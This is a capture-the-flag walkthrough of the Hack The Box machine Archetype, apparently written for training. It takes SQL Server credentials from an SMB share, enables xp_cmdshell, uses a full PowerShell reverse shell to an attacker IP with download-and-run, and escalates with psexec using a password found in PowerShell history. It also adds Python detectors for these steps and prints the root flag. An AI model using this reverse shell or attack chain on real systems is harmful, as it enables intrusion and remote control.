Archetype
Scanning
# Nmap 7.80 scan initiated Fri Jun 18 02:52:56 2021 as: nmap -sC -sV -oA nmap/nmap 10.10.10.27
Nmap scan report for 10.10.10.27
Host is up (0.048s latency).
Not shown: 996 closed ports
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows Server 2019 Standard 17763 microsoft-ds
1433/tcp open ms-sql-s Microsoft SQL Server 2017 14.00.1000.00; RTM
| ms-sql-ntlm-info:
| Target_Name: ARCHETYPE
| NetBIOS_Domain_Name: ARCHETYPE
| NetBIOS_Computer_Name: ARCHETYPE
| DNS_Domain_Name: Archetype
| DNS_Computer_Name: Archetype
|_ Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2021-06-18T07:06:04
|_Not valid after: 2051-06-18T07:06:04
|_ssl-date: 2021-06-18T07:11:38+00:00; +18m24s from scanner time.
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 1h42m23s, deviation: 3h07m50s, median: 18m23s
| ms-sql-info:
| 10.10.10.27:1433:
| Version:
| name: Microsoft SQL Server 2017 RTM
| number: 14.00.1000.00
| Product: Microsoft SQL Server 2017
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
| smb-os-discovery:
| OS: Windows Server 2019 Standard 17763 (Windows Server 2019 Standard 6.3)
| Computer name: Archetype
| NetBIOS computer name: ARCHETYPE\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2021-06-18T00:11:29-07:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-06-18T07:11:30
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Jun 18 02:53:14 2021 -- 1 IP address (1 host up) scanned in 18.46 seconds
Download file
Since I couldn't read the configuration file directly over SMB, I downloaded it to my host with the `get [remote-file-name] [local-file-name]` command.
smb: \> get prod.dtsConfig conf
getting file \prod.dtsConfig of size 609 as conf (3.2 KiloBytes/sec) (average 3.2 KiloBytes/sec)
Credentials
Once the configuration file is open, I can see the credentials in it: ARCHETYPE\sql_svc:M3g4c0rp123. Since "sql" appears in the username, this is most likely a SQL Server service account. In fact, the Nmap scan shows an ms-sql-s service on port 1433.
Access SQL
When it prompts for the password, enter the one found in the configuration file.
$ python3 /usr/share/doc/python3-impacket/examples/mssqlclient.py sql_svc@10.10.10.27 -windows-auth
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation
Password:
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(ARCHETYPE): Line 1: Changed database context to 'master'.
[*] INFO(ARCHETYPE): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (140 3232)
[!] Press help for extra shell commands
SQL>
Current user permission
To check the permissions of the current user I execute the following query: if it returns 1, the user is a member of the indicated server role; otherwise not.
SQL>
select IS_SRVROLEMEMBER ('sysadmin')
-----------
1
Remote Code Execution
I make an attempt to run commands with the xp_cmdshell procedure. First I have to run EXEC sp_configure 'Show Advanced Options', 1; so that the xp_cmdshell option becomes configurable, and after each sp_configure change I have to issue reconfigure;. Then, to enable it, I run EXEC sp_configure 'xp_cmdshell', 1; followed again by reconfigure;. Finally, I can execute commands with xp_cmdshell "<command>".
EXEC sp_configure('Show Advanced Options', 1);
[*] INFO(ARCHETYPE): Line 185: Configuration option 'show advanced options' changed from 1 to 1. Run the RECONFIGURE statement to install.
reconfigure;
EXEC sp_configure('xp_cmdshell', 1);
[*] INFO(ARCHETYPE): Line 185: Configuration option 'xp_cmdshell' changed from 1 to 1. Run the RECONFIGURE statement to install.
reconfigure;
xp_cmdshell "whoami"
output
--------------------------------------------------------------------------------
archetype\sql_svc
NULL
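The INFO messages above are the same "Configuration option ... changed" lines SQL Server records in its ERRORLOG, which makes this step easy to alert on. This added Python example (not part of the writeup) parses a constructed ERRORLOG excerpt and flags sessions that switch on xp_cmdshell; the log line format and the sample lines are assumptions.

```python
import re
from dataclasses import dataclass

# Constructed SQL Server ERRORLOG excerpt (timestamp, spid, message).
# Assumed format for illustration, not the box's real log.
SAMPLE_ERRORLOG = """\
2021-06-18 00:14:58.10 spid55      Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
2021-06-18 00:15:02.31 spid55      Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
2021-06-18 00:15:10.02 spid55      Configuration option 'xp_cmdshell' changed from 1 to 1. Run the RECONFIGURE statement to install.
2021-06-18 00:20:00.00 spid60      Configuration option 'max server memory (MB)' changed from 2147483647 to 4096. Run the RECONFIGURE statement to install.
2021-06-18 00:25:00.00 spid61      Configuration option 'xp_cmdshell' changed from 1 to 0. Run the RECONFIGURE statement to install.
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+ \S+)\s+(?P<spid>spid\d+)\s+Configuration option "
    r"'(?P<opt>[^']+)' changed from (?P<old>\d+) to (?P<new>\d+)\."
)

# Options whose enablement commonly precedes OS command execution from T-SQL.
WATCHED = {"xp_cmdshell": "high", "ole automation procedures": "high", "show advanced options": "medium"}

@dataclass
class Alert:
    ts: str
    spid: str
    option: str
    old: int
    new: int
    severity: str

def scan_errorlog(text):
    """One Alert per watched option switched on; a 1 to 1 change means someone re-ran the enabling command."""
    alerts = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        opt = m["opt"].lower()
        old, new = int(m["old"]), int(m["new"])
        if opt not in WATCHED or new == 0:
            continue  # unwatched option, or the option being turned off
        alerts.append(Alert(m["ts"], m["spid"], opt, old, new, WATCHED[opt]))
    return alerts

def enabling_sessions(text):
    """spids that enabled both 'show advanced options' and xp_cmdshell, the sequence used above."""
    seen = {}
    for a in scan_errorlog(text):
        seen.setdefault(a.spid, set()).add(a.option)
    return {spid for spid, opts in seen.items() if {"show advanced options", "xp_cmdshell"} <= opts}
```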
Reverse shell
For the reverse shell I have to use the one given in the official writeup, because the target checks for known malicious pieces of PowerShell code.
$client = New-Object System.Net.Sockets.TCPClient("10.10.14.84", 4444);
$stream = $client.GetStream();
[byte[]]$bytes = 0..65535 | %{0};
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0) {
$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes, 0, $i);
$sendback = (iex $data 2>&1 | Out-String);
$sendback2 = $sendback + "# ";
$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
$stream.Write($sendbyte, 0, $sendbyte.Length);
$stream.Flush();
}
$client.Close();
Copy and paste the code into a text file and save it with the .ps1 extension.
Note
The string `"PS " + (pwd).Path + "> "` has been replaced with `# ` because it is identified as a malicious string; moreover, that string is not in any way needed for the reverse shell to work, it only gives the user a friendlier prompt. This issue was discussed in the following link at the time when the box was active: https://forum.hackthebox.eu/discussion/3509/starting-point. In order to download the reverse shell I have to start a web server, for simplicity in the same folder where I have my reverse shell.
Serving HTTP on 0.0.0.0 port 8800 (http://0.0.0.0:8800/) ...
10.10.10.27 - - [19/Jun/2021 06:24:20] "GET /rev.ps1 HTTP/1.1" 200 -
Before downloading and executing the reverse shell I have to listen on the chosen port with netcat in another shell.
Finally, to download and execute the reverse shell in one shot, I use the following PowerShell command in the SQL shell, the one where I used mssqlclient.py.
Once connected, I obtain a shell where I can run Windows commands.
10.10.10.27: inverse host lookup failed: Unknown host
connect to [10.10.14.84] from (UNKNOWN) [10.10.10.27] 49681
#
User flag
As this is a normal user account as well as a service account, it is worth checking for frequently accessed files or executed commands. We can use the command below to access the PowerShell history file.
# type C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
net.exe use T: \\Archetype\backups /user:administrator MEGACORP_4dm1n!!
So the credentials for the backups share are: administrator:MEGACORP_4dm1n!!.
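Plaintext credentials left in ConsoleHost_history.txt are exactly what this step relies on, so sweeping your own hosts for them is a cheap hygiene check. This added Python example (not from the writeup) scans a constructed history file for the net use /user: pattern seen above and for ConvertTo-SecureString -AsPlainText, returning findings with the secret redacted; the sample lines and patterns are my own.

```python
import re

# Constructed sample of a PSReadline ConsoleHost_history.txt, not the box's real file.
SAMPLE_HISTORY = """\
Get-ChildItem C:\\backups
net.exe use T: \\\\FILESRV\\backups /user:administrator Example_P@ss1
net use T: /delete
$sec = ConvertTo-SecureString 'Example_P@ss2' -AsPlainText -Force
Invoke-Command -ComputerName srv01 -ScriptBlock { hostname }
"""

# Each pattern captures the secret (and the user where present); secrets are redacted before reporting.
PATTERNS = [
    ("net use", re.compile(r"\bnet(?:\.exe)?\s+use\b.*?/user:(?P<user>\S+)\s+(?P<secret>\S+)", re.I)),
    ("ConvertTo-SecureString -AsPlainText",
     re.compile(r"ConvertTo-SecureString\s+['\"]?(?P<secret>[^'\"\s]+)['\"]?.*-AsPlainText", re.I)),
]

def redact(secret):
    """Keep the first character so a finding can be matched to a rotation ticket without storing the secret."""
    return secret[0] + "*" * (len(secret) - 1) if secret else ""

def scan_history(text):
    """Return a list of findings: line number, pattern kind, user (or None) and the redacted secret."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for kind, rx in PATTERNS:
            m = rx.search(line)
            if not m:
                continue
            findings.append({
                "line": lineno,
                "kind": kind,
                "user": m.groupdict().get("user"),
                "secret": redact(m["secret"]),
            })
    return findings
```

Run it against C:\Users\<user>\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt on each host; any hit means the credential should be rotated and the history line removed.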
(kali@kali)~/htb/archetype$
python3 /usr/share/doc/python3-impacket/examples/psexec.py administrator@10.10.10.27
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation
Password:
[*] Requesting shares on 10.10.10.27.....
[*] Found writable share ADMIN$
[*] Uploading file ehFXfEZp.exe
[*] Opening SVCManager on 10.10.10.27.....
[*] Creating service FpdE on 10.10.10.27.....
[*] Starting service FpdE.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>
Root flag
Directory of C:\Users\Administrator\Desktop
01/20/2020 06:42 AM <DIR> .
01/20/2020 06:42 AM <DIR> ..
02/25/2020 07:36 AM 32 root.txt
1 File(s) 32 bytes
2 Dir(s) 33,819,779,072 bytes free
C:\Users\Administrator\Desktop>type root.txt
b91ccec3305e98240082d4474b848528